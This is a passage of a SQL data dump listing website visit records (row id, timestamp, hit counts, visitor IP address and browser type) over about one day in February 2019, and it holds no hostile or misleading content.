0,'54.36.150.94','other'),(390031,1550895399,1,1,0,0,'54.36.149.16','other'),(390032,1550895566,1,1,0,0,'54.36.148.99','other'),(390033,1550895631,1,1,0,0,'54.36.149.58','other'),(390034,1550895664,1,1,0,0,'54.36.149.100','other'),(390035,1550895808,1,1,0,0,'54.36.148.21','other'),(390036,1550895828,2,2,0,0,'66.249.64.30','chrome'),(390037,1550896086,1,1,0,0,'54.36.148.125','other'),(390038,1550896478,1,1,0,0,'207.46.13.205','other'),(390039,1550896514,1,1,0,0,'54.36.150.76','other'),(390040,1550896887,1,1,0,0,'54.36.148.126','other'),(390041,1550897224,1,1,0,0,'66.249.64.60','chrome'),(390042,1550897591,1,1,0,0,'207.46.13.152','other'),(390043,1550897759,1,1,0,0,'66.249.64.30','chrome'),(390044,1550898090,1,1,0,0,'8.29.198.27','other'),(390045,1550898097,1,1,0,0,'46.229.168.153','other'),(390046,1550898205,1,1,0,0,'54.36.150.7','other'),(390047,1550898259,1,1,0,0,'54.36.148.7','other'),(390048,1550898302,1,1,0,0,'66.249.64.60','chrome'),(390049,1550898400,1,1,0,0,'54.36.148.198','other'),(390050,1550898539,1,1,0,0,'54.36.148.75','other'),(390051,1550898659,2,2,0,0,'66.249.64.31','chrome'),(390052,1550898805,1,1,0,0,'216.244.66.241','other'),(390053,1550898934,1,1,0,0,'54.36.150.171','other'),(390054,1550898966,1,1,0,0,'40.77.167.131','other'),(390055,1550899414,1,1,0,0,'8.29.198.25','other'),(390056,1550899478,1,1,0,0,'54.36.150.190','other'),(390057,1550899633,1,1,0,0,'207.46.13.205','other'),(390058,1550899818,1,1,0,0,'46.229.168.140','other'),(390059,1550899906,1,1,0,0,'54.36.148.141','other'),(390060,1550900075,1,1,0,0,'66.249.64.62','chrome'),(390061,1550900367,2,2,0,0,'66.249.64.31','chrome'),(390062,1550900483,1,1,0,0,'37.9.113.148','other'),(390063,1550900491,1,1,0,0,'54.36.149.12','other'),(390064,1550900495,2,2,0,0,'141.8.142.103','other'),(390065,1550900580,2,2,0,0,'178.154.244.11','other'),(390066,1550900588,8,8,0,0,'5.45.207.19','other'),(390067,1550900602,1,1,0,0,'66.249.64.29','chrome'),(390068,1550900751,1,1,0,0,'54.36.150.186','other'),(390069,1550900787,1,1,0,0,'66.249.64.30','chrome'),(390070,1550900805,1,1,0,0,'66.249.64.58','chrome'),(390071,1550900881,3,3,0,0,'207.46.13.152','other'),(390072,1550901014,2,2,0,0,'216.244.66.241','other'),(390073,1550901129,1,1,0,0,'54.36.148.18','other'),(390074,1550901225,1,1,0,0,'5.45.207.79','other'),(390075,1550901457,1,1,0,0,'87.250.224.65','other'),(390076,1550901553,1,1,0,0,'141.8.142.103','other'),(390077,1550901590,1,1,0,0,'178.154.244.11','other'),(390078,1550901617,2,2,0,0,'37.9.113.148','other'),(390079,1550901633,2,2,0,0,'5.45.207.19','other'),(390080,1550901709,1,1,0,0,'54.36.148.166','other'),(390081,1550901856,1,1,0,0,'54.36.150.155','other'),(390082,1550902144,1,1,0,0,'54.36.150.139','other'),(390083,1550902195,1,1,0,0,'188.68.40.176','other'),(390084,1550902469,1,1,0,0,'134.73.199.154','chrome'),(390085,1550902525,1,1,0,0,'207.46.13.226','other'),(390086,1550902704,1,1,0,0,'54.36.148.25','other'),(390087,1550902980,1,1,0,0,'54.36.148.82','other'),(390088,1550903033,1,1,0,0,'54.36.150.140','other'),(390089,1550903110,1,1,0,0,'66.249.64.31','chrome'),(390090,1550903308,2,2,0,0,'66.249.64.29','chrome'),(390091,1550903409,1,1,0,0,'54.36.150.117','other'),(390092,1550903524,1,1,0,0,'91.196.178.171','chrome'),(390093,1550904018,1,1,0,0,'91.196.178.181','chrome'),(390094,1550904101,2,2,0,0,'40.77.167.158','other'),(390095,1550904393,1,1,0,0,'54.36.148.155','other'),(390096,1550904633,1,1,0,0,'54.36.148.98','other'),(390097,1550904662,1,1,0,0,'54.36.148.189','other'),(390098,1550904784,1,1,0,0,'54.36.148.142','other'),(390099,1550905046,2,2,0,0,'66.249.64.30','chrome'),(390100,1550905164,1,1,0,0,'66.249.64.60','chrome'),(390101,1550905532,1,1,0,0,'66.249.64.31','chrome'),(390102,1550905542,1,1,0,0,'66.249.64.62','chrome'),(390103,1550905570,1,1,0,0,'46.229.168.152','other'),(390104,1550905916,1,1,0,0,'54.36.150.187','other'),(390105,1550906084,1,1,0,0,'66.249.64.30','chrome'),(390106,1550906175,1,1,0,0,'54.36.148.102','other'),(390107,1550906458,1,1,0,0,'54.36.150.182','other'),(390108,1550906593,1,1,0,0,'207.46.13.146','other'),(390109,1550906615,1,1,0,0,'46.211.70.200','chrome'),(390110,1550907015,1,1,0,0,'54.36.148.49','other'),(390111,1550907264,1,1,0,0,'66.249.64.30','chrome'),(390112,1550907341,1,1,0,0,'95.163.255.105','other'),(390113,1550907553,1,1,0,0,'54.36.149.38','other'),(390114,1550907747,1,1,0,0,'40.77.167.158','other'),(390115,1550907850,1,1,0,0,'66.249.64.31','chrome'),(390116,1550908247,1,1,0,0,'207.46.13.146','other'),(390117,1550908312,1,1,0,0,'207.46.13.67','other'),(390118,1550908430,1,1,0,0,'54.36.148.87','other'),(390119,1550908485,1,1,0,0,'54.36.148.251','other'),(390120,1550908926,1,1,0,0,'8.29.198.27','other'),(390121,1550909090,1,1,0,0,'66.249.64.31','chrome'),(390122,1550909167,1,1,0,0,'40.77.167.158','other'),(390123,1550909223,2,2,0,0,'66.249.64.30','chrome'),(390124,1550909332,1,1,0,0,'54.36.150.9','other'),(390125,1550909363,1,1,0,0,'207.46.13.152','other'),(390126,1550909375,1,1,0,0,'54.36.148.191','other'),(390127,1550909477,1,1,0,0,'66.249.64.60','chrome'),(390128,1550909710,1,1,0,0,'54.36.148.133','other'),(390129,1550909770,1,1,0,0,'95.163.255.108','other'),(390130,1550910227,1,1,0,0,'46.211.126.52','chrome'),(390131,1550910254,1,1,0,0,'8.29.198.27','other'),(390132,1550910467,1,1,0,0,'54.36.150.63','other'),(390133,1550910604,1,1,0,0,'66.249.64.30','chrome'),(390134,1550910752,1,1,0,0,'46.229.168.135','other'),(390135,1550910850,1,1,0,0,'54.36.150.136','other'),(390136,1550910865,1,1,0,0,'54.36.150.81','other'),(390137,1550910940,1,1,0,0,'46.96.19.168','chrome'),(390138,1550911020,1,1,0,0,'66.249.64.29','chrome'),(390139,1550911078,1,1,0,0,'54.36.150.68','other'),(390140,1550911273,1,1,0,0,'54.36.148.113','other'),(390141,1550911519,1,1,0,0,'54.36.150.18','other'),(390142,1550911554,3,3,0,0,'216.244.66.241','other'),(390143,1550911945,1,1,0,0,'207.46.13.104','other'),(390144,1550912505,1,1,0,0,'66.249.64.30','chrome'),(390145,1550912598,1,1,0,0,'207.46.13.152','other'),(390146,1550912689,2,2,0,0,'66.249.64.58','chrome'),(390147,1550912836,1,1,0,0,'207.46.13.67','other'),(390148,1550913028,1,1,0,0,'91.196.178.61','chrome'),(390149,1550913061,1,1,0,0,'54.36.150.163','other'),(390150,1550913304,1,1,0,0,'209.17.97.34','other'),(390151,1550913422,1,1,0,0,'54.36.150.135','other'),(390152,1550913475,1,1,0,0,'91.196.178.134','chrome'),(390153,1550913498,1,1,0,0,'54.36.148.226','other'),(390154,1550913577,1,1,0,0,'66.249.64.30','chrome'),(390155,1550913598,1,1,0,0,'54.36.149.55','other'),(390156,1550914619,1,1,0,0,'216.244.66.241','other'),(390157,1550914807,1,1,0,0,'46.229.168.138','other'),(390158,1550915265,1,1,0,0,'66.249.64.30','chrome'),(390159,1550915512,1,1,0,0,'54.36.149.72','other'),(390160,1550916002,1,1,0,0,'66.249.64.31','chrome'),(390161,1550916003,1,1,0,0,'54.36.149.81','other'),(390162,1550916284,1,1,0,0,'54.36.149.54','other'),(390163,1550916480,1,1,0,0,'54.36.148.230','other'),(390164,1550916535,1,1,0,0,'54.36.150.51','other'),(390165,1550916715,5,5,0,0,'216.244.66.241','other'),(390166,1550916850,1,1,0,0,'207.46.13.67','other'),(390167,1550916955,1,1,0,0,'66.249.64.30','chrome'),(390168,1550917540,1,1,0,0,'54.36.148.62','other'),(390169,1550917700,1,1,0,0,'66.249.64.31','chrome'),(390170,1550917988,1,1,0,0,'54.36.149.84','other'),(390171,1550918017,1,1,0,0,'54.36.150.98','other'),(390172,1550918303,1,1,0,0,'54.36.148.89','other'),(390173,1550918314,1,1,0,0,'46.229.168.135','other'),(390174,1550918809,1,1,0,0,'54.36.148.66','other'),(390175,1550919027,1,1,0,0,'207.46.13.69','other'),(390176,1550919341,1,1,0,0,'54.36.148.31','other'),(390177,1550919390,2,2,0,0,'207.46.13.67','other'),(390178,1550919480,1,1,0,0,'54.36.149.19','other'),(390179,1550919533,2,2,0,0,'141.8.142.103','other'),(390180,1550919544,4,4,0,0,'5.45.207.19','other'),(390181,1550919571,1,1,0,0,'87.250.224.81','other'),(390182,1550919588,1,1,0,0,'46.229.168.153','other'),(390183,1550919593,1,1,0,0,'178.154.244.49','other'),(390184,1550919597,1,1,0,0,'87.250.224.64','other'),(390185,1550919761,1,1,0,0,'8.29.198.25','other'),(390186,1550919823,2,2,0,0,'37.9.113.148','other'),(390187,1550919840,2,2,0,0,'5.45.207.79','other'),(390188,1550919897,1,1,0,0,'46.229.168.149','other'),(390189,1550919922,2,2,0,0,'216.244.66.241','other'),(390190,1550919939,8,8,0,0,'178.154.244.11','other'),(390191,1550919965,1,1,0,0,'54.36.150.176','other'),(390192,1550920083,2,2,0,0,'66.249.64.30','chrome'),(390193,1550920093,1,1,0,0,'54.36.150.147','other'),(390194,1550920171,2,2,0,0,'37.9.113.20','other'),(390195,1550920281,1,1,0,0,'54.36.148.230','other'),(390196,1550920471,1,1,0,0,'178.154.171.27','other'),(390197,1550920499,1,1,0,0,'178.154.200.48','other'),(390198,1550920534,5,5,0,0,'5.45.207.19','other'),(390199,1550920605,2,2,0,0,'141.8.142.103','other'),(390200,1550920656,2,2,0,0,'213.180.203.40','other'),(390201,1550920669,1,1,0,0,'82.145.210.227','other'),(390202,1550920741,1,1,0,0,'54.36.150.81','other'),(390203,1550920905,1,1,0,0,'54.36.148.215','other'),(390204,1550920914,1,1,0,0,'46.211.65.60','chrome'),(390205,1550921014,1,1,0,0,'54.36.148.71','other'),(390206,1550921028,9,9,0,0,'178.154.244.11','other'),(390207,1550921083,8,8,0,0,'5.45.207.79','other'),(390208,1550921097,1,1,0,0,'8.29.198.25','other'),(390209,1550921158,1,1,0,0,'66.249.64.29','chrome'),(390210,1550921275,1,1,0,0,'87.250.224.81','other'),(390211,1550921334,1,1,0,0,'54.36.149.81','other'),(390212,1550921403,1,1,0,0,'37.9.113.20','other'),(390213,1550921455,1,1,0,0,'141.8.142.108','other'),(390214,1550921456,1,1,0,0,'213.180.203.9','other'),(390215,1550921473,1,1,0,0,'37.248.208.213','chrome'),(390216,1550921482,1,1,0,0,'141.8.183.23','other'),(390217,1550921554,1,1,0,0,'66.249.64.31','chrome'),(390218,1550921586,4,4,0,0,'141.8.142.103','other'),(390219,1550921622,4,4,0,0,'5.45.207.19','other'),(390220,1550921680,1,1,0,0,'54.36.150.82','other'),(390221,1550921695,1,1,0,0,'66.249.64.30','chrome'),(390222,1550921723,1,1,0,0,'207.46.13.67','other'),(390223,1550922173,4,4,0,0,'216.244.66.241','other'),(390224,1550922196,3,3,0,0,'178.154.244.11','other'),(390225,1550922334,1,1,0,0,'5.45.207.79','other'),(390226,1550922336,1,1,0,0,'91.196.178.136','chrome'),(390227,1550922605,1,1,0,0,'54.36.150.122','other'),(390228,1550922641,1,1,0,0,'141.8.142.103','other'),(390229,1550922712,1,1,0,0,'95.108.213.4','other'),(390230,1550922828,2,2,0,0,'66.249.64.31','chrome'),(390231,1550923098,1,1,0,0,'46.229.168.153','other'),(390232,1550923367,1,1,0,0,'54.36.148.239','other'),(390233,1550923883,2,2,0,0,'207.46.13.69','other'),(390234,1550924229,1,1,0,0,'66.249.64.29','chrome'),(390235,1550924758,1,1,0,0,'66.249.64.31','chrome'),(390236,1550924862,1,1,0,0,'54.36.150.34','other'),(390237,1550924949,1,1,0,0,'207.46.13.69','other'),(390238,1550925016,1,1,0,0,'46.229.168.145','other'),(390239,1550925054,2,2,0,0,'40.77.167.125','other'),(390240,1550925061,1,1,0,0,'46.229.168.143','other'),(390241,1550925130,1,1,0,0,'157.55.39.108','other'),(390242,1550925177,1,1,0,0,'216.244.66.241','other'),(390243,1550925200,1,1,0,0,'54.36.148.116','other'),(390244,1550925513,1,1,0,0,'54.36.150.39','other'),(390245,1550925564,1,1,0,0,'212.113.42.34','chrome'),(390246,1550925819,1,1,0,0,'66.249.64.60','chrome'),(390247,1550925899,1,1,0,0,'92.112.104.51','firefox'),(390248,1550926113,1,1,0,0,'91.196.178.101','chrome'),(390249,1550926210,1,1,0,0,'54.36.149.54','other'),(390250,1550926258,1,1,0,0,'54.36.150.101','other'),(390251,1550926305,2,2,0,0,'66.249.64.29','chrome'),(390252,1550926307,1,1,0,0,'92.112.104.51','chrome'),(390253,1550926546,1,1,0,0,'66.249.64.31','chrome'),(390254,1550926645,1,1,0,0,'46.229.168.137','other'),(390255,1550926660,1,1,0,0,'54.36.148.95','other'),(390256,1550927366,1,1,0,0,'54.36.150.143','other'),(390257,1550927522,1,1,0,0,'54.36.148.198','other'),(390258,1550927789,5,5,0,0,'216.244.66.241','other'),(390259,1550927845,1,1,0,0,'46.229.168.149','other'),(390260,1550928009,1,1,0,0,'66.249.64.30','chrome'),(390261,1550928111,1,1,0,0,'91.196.178.130','chrome'),(390262,1550928359,1,1,0,0,'207.46.13.69','other'),(390263,1550928630,1,1,0,0,'91.196.178.187','chrome'),(390264,1550928659,1,1,0,0,'66.249.64.31','chrome'),(390265,1550928701,3,3,0,0,'46.229.168.133','other'),(390266,1550928705,1,1,0,0,'178.133.70.198','chrome'),(390267,1550928837,1,1,0,0,'91.196.178.164','other'),(390268,1550928838,1,1,0,0,'54.36.150.90','other'),(390269,1550928839,1,1,0,0,'66.249.64.29','chrome'),(390270,1550928925,1,1,0,0,'92.113.157.87','chrome'),(390271,1550928972,2,2,0,0,'178.92.75.218','chrome'),(390272,1550928987,2,2,0,0,'91.196.178.166','chrome'),(390273,1550929050,1,1,0,0,'54.36.148.51','other'),(390274,1550929264,1,1,0,0,'54.36.148.22','other'),(390275,1550929350,1,1,0,0,'54.36.150.6','other'),(390276,1550929481,1,1,0,0,'54.36.149.65','other'),(390277,1550929559,1,1,0,0,'207.46.13.69','other'),(390278,1550929760,1,1,0,0,'54.36.148.29','other'),(390279,1550929876,1,1,0,0,'91.196.178.65','chrome'),(390280,1550929990,1,1,0,0,'66.249.64.29','chrome'),(390281,1550930066,1,1,0,0,'54.36.148.28','other'),(390282,1550930112,1,1,0,0,'46.229.168.150','other'),(390283,1550930231,1,1,0,0,'46.211.112.22','chrome'),(390284,1550930266,1,1,0,0,'54.36.148.219','other'),(390285,1550930591,1,1,0,0,'54.36.149.45','other'),(390286,1550930600,1,1,0,0,'8.29.198.26','other'),(390287,1550930645,1,1,0,0,'180.76.15.155','other'),(390288,1550930694,1,1,0,0,'91.196.178.130','chrome'),(390289,1550930878,1,1,0,0,'216.244.66.241','other'),(390290,1550930910,1,1,0,0,'157.55.39.108','other'),(390291,1550931088,1,1,0,0,'91.196.178.9','chrome'),(390292,1550931291,1,1,0,0,'72.35.247.136','chrome'),(390293,1550931298,1,1,0,0,'91.196.178.50','chrome'),(390294,1550931314,1,1,0,0,'54.36.150.114','other'),(390295,1550931499,1,1,0,0,'91.196.178.75','other'),(390296,1550931842,1,1,0,0,'91.196.178.23','other'),(390297,1550931920,1,1,0,0,'54.36.149.19','other'),(390298,1550931938,1,1,0,0,'8.29.198.26','other'),(390299,1550932040,1,1,0,0,'54.36.148.12','other'),(390300,1550932110,1,1,0,0,'37.53.225.133','chrome'),(390301,1550932209,1,1,0,0,'77.111.247.68','chrome'),(390302,1550932259,2,2,0,0,'66.249.64.62','chrome'),(390303,1550932282,1,1,0,0,'66.249.64.30','chrome'),(390304,1550932311,1,1,0,0,'91.196.177.189','other'),(390305,1550932361,1,1,0,0,'91.196.178.136','chrome'),(390306,1550932428,1,1,0,0,'54.36.150.66','other'),(390307,1550932541,1,1,0,0,'92.113.191.170','chrome'),(390308,1550932619,1,1,0,0,'91.196.178.174','chrome'),(390309,1550932844,1,1,0,0,'37.54.114.43','chrome'),(390310,1550933043,1,1,0,0,'46.96.11.131','chrome'),(390311,1550933338,1,1,0,0,'91.196.178.65','chrome'),(390312,1550933376,1,1,0,0,'54.36.149.53','other'),(390313,1550933438,1,1,0,0,'37.53.231.110','chrome'),(390314,1550933444,1,1,0,0,'46.211.20.5','chrome'),(390315,1550933531,1,1,0,0,'37.54.114.236','chrome'),(390316,1550933761,1,1,0,0,'91.196.178.162','chrome'),(390317,1550933805,1,1,0,0,'46.211.64.25','chrome'),(390318,1550933947,1,1,0,0,'91.196.178.100','chrome'),(390319,1550933973,1,1,0,0,'46.211.9.210','chrome'),(390320,1550934249,2,2,0,0,'207.46.13.138','other'),(390321,1550934460,1,1,0,0,'54.36.149.44','other'),(390322,1550934491,1,1,0,0,'66.249.64.31','chrome'),(390323,1550934550,1,1,0,0,'91.196.178.101','chrome'),(390324,1550934716,1,1,0,0,'91.196.178.47','chrome'),(390325,1550934768,1,1,0,0,'91.196.178.97','chrome'),(390326,1550934815,1,1,0,0,'91.196.178.72','chrome'),(390327,1550934836,1,1,0,0,'91.196.177.8','chrome'),(390328,1550934857,1,1,0,0,'91.196.178.55','chrome'),(390329,1550934863,1,1,0,0,'91.196.178.100','chrome'),(390330,1550934906,1,1,0,0,'92.113.156.166','chrome'),(390331,1550935008,1,1,0,0,'91.196.177.20','chrome'),(390332,1550935045,2,2,0,0,'91.196.178.86','chrome'),(390333,1550935129,1,1,0,0,'91.196.178.165','chrome'),(390334,1550935204,1,1,0,0,'95.132.38.182','chrome'),(390335,1550935230,1,1,0,0,'91.196.177.147','other'),(390336,1550935266,1,1,0,0,'91.196.178.102','chrome'),(390337,1550935271,1,1,0,0,'91.196.178.103','chrome'),(390338,1550935322,1,1,0,0,'46.96.3.138','chrome'),(390339,1550935339,1,1,0,0,'91.196.178.189','chrome'),(390340,1550935344,1,1,0,0,'91.196.178.53','other'),(390341,1550935473,1,1,0,0,'46.133.71.116','chrome'),(390342,1550935498,6,6,0,0,'178.154.244.11','other'),(390343,1550935549,1,1,0,0,'54.36.148.251','other'),(390344,1550935652,1,1,0,0,'54.36.148.56','other'),(390345,1550935669,1,1,0,0,'91.196.178.53','chrome'),(390346,1550935787,2,2,0,0,'141.8.142.103','other'),(390347,1550935791,1,1,0,0,'216.244.66.241','other'),(390348,1550935960,3,3,0,0,'5.45.207.19','other'),(390349,1550936001,5,5,0,0,'5.45.207.79','other'),(390350,1550936006,1,1,0,0,'91.196.178.98','chrome'),(390351,1550936125,1,1,0,0,'95.108.213.4','other'),(390352,1550936279,1,1,0,0,'91.196.178.165','chrome'),(390353,1550936285,1,1,0,0,'91.196.177.186','chrome'),(390354,1550936356,1,1,0,0,'46.96.14.173','chrome'),(390355,1550936360,1,1,0,0,'95.134.185.41','chrome'),(390356,1550936404,3,3,0,0,'178.154.244.11','other'),(390357,1550936544,1,1,0,0,'40.77.167.97','other'),(390358,1550936554,1,1,0,0,'46.211.96.83','chrome'),(390359,1550936647,1,1,0,0,'91.196.178.53','other'),(390360,1550936660,1,1,0,0,'46.229.168.132','other'),(390361,1550936690,1,1,0,0,'82.145.210.98','other'),(390362,1550936908,1,1,0,0,'5.45.207.19','other'),(390363,1550936983,1,1,0,0,'141.8.142.103','other'),(390364,1550937109,1,1,0,0,'54.36.150.17','other'),(390365,1550937157,2,2,0,0,'66.249.64.30','chrome'),(390366,1550937178,2,2,0,0,'5.45.207.79','other'),(390367,1550937443,1,1,0,0,'91.196.178.165','chrome'),(390368,1550937455,2,2,0,0,'178.154.244.11','other'),(390369,1550937490,1,1,0,0,'95.134.171.206','chrome'),(390370,1550937494,1,1,0,0,'54.36.148.25','other'),(390371,1550937543,1,1,0,0,'91.196.178.82','chrome'),(390372,1550937710,3,3,0,0,'37.55.57.68','chrome'),(390373,1550937817,1,1,0,0,'46.211.96.83','chrome'),(390374,1550937936,1,1,0,0,'207.46.13.138','other'),(390375,1550938016,1,1,0,0,'46.229.168.150','other'),(390376,1550938185,1,1,0,0,'91.196.178.172','chrome'),(390377,1550938198,1,1,0,0,'80.246.133.20','chrome'),(390378,1550938365,2,2,0,0,'91.196.178.173','other'),(390379,1550938403,2,2,0,0,'66.249.64.31','chrome'),(390380,1550938417,1,1,0,0,'216.244.66.241','other'),(390381,1550938486,1,1,0,0,'46.229.168.134','other'),(390382,1550938656,1,1,0,0,'46.211.10.193','other'),(390383,1550938660,1,1,0,0,'77.111.247.67','chrome'),(390384,1550938685,1,1,0,0,'95.132.38.182','chrome'),(390385,1550938813,1,1,0,0,'5.45.207.19','other'),(390386,1550938996,1,1,0,0,'178.95.245.101','chrome'),(390387,1550939037,1,1,0,0,'54.36.150.187','other'),(390388,1550939179,1,1,0,0,'54.36.148.7','other'),(390389,1550939373,1,1,0,0,'91.196.178.66','chrome'),(390390,1550939441,1,1,0,0,'46.211.126.233','chrome'),(390391,1550939557,1,1,0,0,'91.196.178.129','chrome'),(390392,1550939616,1,1,0,0,'91.196.178.131','other'),(390393,1550939619,1,1,0,0,'54.37.253.57','other'),(390394,1550939695,1,1,0,0,'54.36.148.80','other'),(390395,1550940068,2,2,0,0,'66.249.64.31','chrome'),(390396,1550940095,1,1,0,0,'66.249.64.30','chrome'),(390397,1550940197,1,1,0,0,'54.36.148.111','other'),(390398,1550940245,1,1,0,0,'54.36.149.96','other'),(390399,1550940269,1,1,0,0,'54.36.149.86','other'),(390400,1550940415,1,1,0,0,'54.36.148.2','other'),(390401,1550940573,1,1,0,0,'91.196.178.98','chrome'),(390402,1550940574,1,1,0,0,'52.53.201.78','chrome'),(390403,1550941040,3,3,0,0,'216.244.66.241','other'),(390404,1550941049,1,1,0,0,'54.36.150.147','other'),(390405,1550941435,1,1,0,0,'8.29.198.25','other'),(390406,1550941520,1,1,0,0,'66.249.64.29','chrome'),(390407,1550941751,1,1,0,0,'130.180.210.226','chrome'),(390408,1550941766,1,1,0,0,'54.36.148.4','other'),(390409,1550942011,1,1,0,0,'46.229.168.148','other'),(390410,1550942049,1,1,0,0,'37.53.231.110','chrome'),(390411,1550942070,1,1,0,0,'54.36.148.166','other'),(390412,1550942255,1,1,0,0,'91.196.178.43','chrome'),(390413,1550942312,1,1,0,0,'54.36.148.28','other'),(390414,1550942327,1,1,0,0,'66.249.64.31','chrome'),(390415,1550942472,1,1,0,0,'192.162.35.130','chrome'),(390416,1550942586,1,1,0,0,'40.77.167.106','other'),(390417,1550942765,1,1,0,0,'8.29.198.27','other'),(390418,1550942835,1,1,0,0,'92.113.156.120','chrome'),(390419,1550943488,1,1,0,0,'66.249.64.31','chrome'),(390420,1550943610,1,1,0,0,'91.196.178.101','chrome'),(390421,1550943781,1,1,0,0,'216.244.66.241','other'),(390422,1550943904,1,1,0,0,'46.211.65.86','chrome'),(390423,1550943936,1,1,0,0,'66.249.64.29','chrome'),(390424,1550944020,1,1,0,0,'37.73.250.170','chrome'),(390425,1550944116,1,1,0,0,'54.36.150.187','other'),(390426,1550944229,1,1,0,0,'54.36.148.151','other'),(390427,1550944578,1,1,0,0,'157.55.39.108','other'),(390428,1550944956,1,1,0,0,'54.36.148.241','other'),(390429,1550945100,1,1,0,0,'54.36.150.104','other'),(390430,1550945133,1,1,0,0,'91.196.178.44','chrome'),(390431,1550945378,1,1,0,0,'54.36.149.8','other'),(390432,1550945415,1,1,0,0,'54.36.148.197','other'),(390433,1550945747,1,1,0,0,'46.229.168.136','other'),(390434,1550946296,1,1,0,0,'54.36.148.225','other'),(390435,1550946692,1,1,0,0,'66.249.64.29','chrome'),(390436,1550946772,1,1,0,0,'54.36.150.144','other'),(390437,1550946831,1,1,0,0,'40.77.167.61','other'),(390438,1550946877,1,1,0,0,'54.36.150.4','other'),(390439,1550946955,1,1,0,0,'46.211.73.116','chrome'),(390440,1550947214,1,1,0,0,'66.249.64.62','chrome'),(390441,1550947370,1,1,0,0,'54.36.148.122','other'),(390442,1550947405,1,1,0,0,'91.196.178.132','chrome'),(390443,1550947624,1,1,0,0,'91.196.177.167','chrome'),(390444,1550947680,1,1,0,0,'54.36.148.253','other'),(390445,1550947878,1,1,0,0,'54.36.149.17','other'),(390446,1550947925,1,1,0,0,'91.196.178.131','chrome'),(390447,1550947977,1,1,0,0,'54.36.148.41','other'),(390448,1550947993,1,1,0,0,'66.249.64.29','chrome'),(390449,1550948018,1,1,0,0,'40.77.167.185','other'),(390450,1550948059,1,1,0,0,'37.55.150.232','chrome'),(390451,1550948285,1,1,0,0,'40.77.167.145','other'),(390452,1550948885,2,2,0,0,'216.244.66.241','other'),(390453,1550948971,1,1,0,0,'54.36.148.110','other'),(390454,1550949467,1,1,0,0,'91.196.178.134','chrome'),(390455,1550949715,1,1,0,0,'54.36.148.125','other'),(390456,1550949944,1,1,0,0,'66.249.64.31','chrome'),(390457,1550950189,1,1,0,0,'40.77.167.185','other'),(390458,1550950212,1,1,0,0,'91.196.178.173','chrome'),(390459,1550950234,1,1,0,0,'66.249.64.60','chrome'),(390460,1550950563,1,1,0,0,'54.36.148.177','other'),(390461,1550951166,1,1,0,0,'54.36.148.157','other'),(390462,1550951506,1,1,0,0,'66.249.64.60','chrome'),(390463,1550951584,1,1,0,0,'66.249.64.30','chrome'),(390464,1550951635,5,5,0,0,'216.244.66.241','other'),(390465,1550951963,1,1,0,0,'54.36.148.249','other'),(390466,1550951965,1,1,0,0,'94.232.79.225','chrome'),(390467,1550952239,9,9,0,0,'178.154.244.11','other'),(390468,1550952273,1,1,0,0,'8.29.198.27','other'),(390469,1550952519,1,1,0,0,'54.36.150.73','other'),(390470,1550952538,1,1,0,0,'157.55.39.172','other'),(390471,1550952561,1,1,0,0,'66.249.64.31','chrome'),(390472,1550952612,2,2,0,0,'5.45.207.19','other'),(390473,1550952660,4,4,0,0,'5.45.207.79','other'),(390474,1550952771,3,3,0,0,'95.108.213.4','other'),(390475,1550952791,1,1,0,0,'87.250.224.65','other'),(390476,1550953147,9,9,0,0,'178.154.244.11','other'),(390477,1550953243,1,1,0,0,'54.36.150.108','other'),(390478,1550953412,1,1,0,0,'54.36.148.169','other'),(390479,1550953480,1,1,0,0,'46.229.168.148','other'),(390480,1550953532,1,1,0,0,'46.229.168.151','other'),(390481,1550953574,3,3,0,0,'5.45.207.79','other'),(390482,1550953597,1,1,0,0,'8.29.198.26','other'),(390483,1550953698,3,3,0,0,'5.45.207.19','other'),(390484,1550953722,1,1,0,0,'180.76.15.33','other'),(390485,1550953802,1,1,0,0,'54.36.148.19','other'),(390486,1550953808,3,3,0,0,'141.8.142.103','other'),(390487,1550954084,1,1,0,0,'54.36.150.27','other'),(390488,1550954225,3,3,0,0,'178.154.244.11','other'),(390489,1550954371,2,2,0,0,'216.244.66.241','other'),(390490,1550954493,1,1,0,0,'54.36.148.111','other'),(390491,1550954508,1,1,0,0,'54.36.150.71','other'),(390492,1550954574,2,2,0,0,'66.249.64.126','chrome'),(390493,1550954818,1,1,0,0,'40.77.167.145','other'),(390494,1550954850,1,1,0,0,'46.229.168.137','other'),(390495,1550954988,3,3,0,0,'5.45.207.79','other'),(390496,1550955003,4,4,0,0,'5.45.207.19','other'),(390497,1550955037,2,2,0,0,'141.8.142.103','other'),(390498,1550955118,1,1,0,0,'207.46.13.192','other'),(390499,1550955141,2,2,0,0,'178.154.244.11','other'),(390500,1550955418,1,1,0,0,'95.108.213.4','other'),(390501,1550955743,1,1,0,0,'66.249.64.124','chrome'),(390502,1550955755,1,1,0,0,'54.36.149.89','other'),(390503,1550955994,1,1,0,0,'141.8.142.103','other'),(390504,1550955996,1,1,0,0,'66.249.64.29','chrome'),(390505,1550956150,1,1,0,0,'178.154.244.11','other'),(390506,1550956227,1,1,0,0,'54.36.150.66','other'),(390507,1550956531,2,2,0,0,'66.249.64.60','chrome'),(390508,1550956666,2,2,0,0,'157.55.39.100','other'),(390509,1550956771,1,1,0,0,'54.36.149.103','other'),(390510,1550957006,1,1,0,0,'66.249.64.62','chrome'),(390511,1550957048,2,2,0,0,'66.249.64.29','chrome'),(390512,1550957125,1,1,0,0,'46.229.168.139','other'),(390513,1550957135,1,1,0,0,'40.77.167.145','other'),(390514,1550957435,1,1,0,0,'216.244.66.241','other'),(390515,1550957722,1,1,0,0,'180.76.15.14','other'),(390516,1550957876,1,1,0,0,'66.249.64.58','chrome'),(390517,1550957984,1,1,0,0,'54.36.150.5','other'),(390518,1550957993,1,1,0,0,'54.36.150.152','other'),(390519,1550958133,1,1,0,0,'54.36.148.177','other'),(390520,1550958540,1,1,0,0,'66.249.64.60','chrome'),(390521,1550959043,1,1,0,0,'46.229.168.133','other'),(390522,1550959081,1,1,0,0,'54.36.148.175','other'),(390523,1550959086,1,1,0,0,'54.36.148.120','other'),(390524,1550959182,1,1,0,0,'46.229.168.129','other'),(390525,1550959243,1,1,0,0,'66.249.64.62','chrome'),(390526,1550959416,1,1,0,0,'157.55.39.100','other'),(390527,1550959548,1,1,0,0,'66.249.64.30','chrome'),(390528,1550959636,1,1,0,0,'54.36.148.15','other'),(390529,1550959644,1,1,0,0,'54.36.150.170','other'),(390530,1550959765,1,1,0,0,'54.36.150.0','other'),(390531,1550959943,2,2,0,0,'54.36.150.93','other'),(390532,1550960189,1,1,0,0,'54.36.148.74','other'),(390533,1550960530,1,1,0,0,'66.249.64.62','chrome'),(390534,1550960939,2,2,0,0,'66.249.64.58','chrome'),(390535,1550961141,1,1,0,0,'54.36.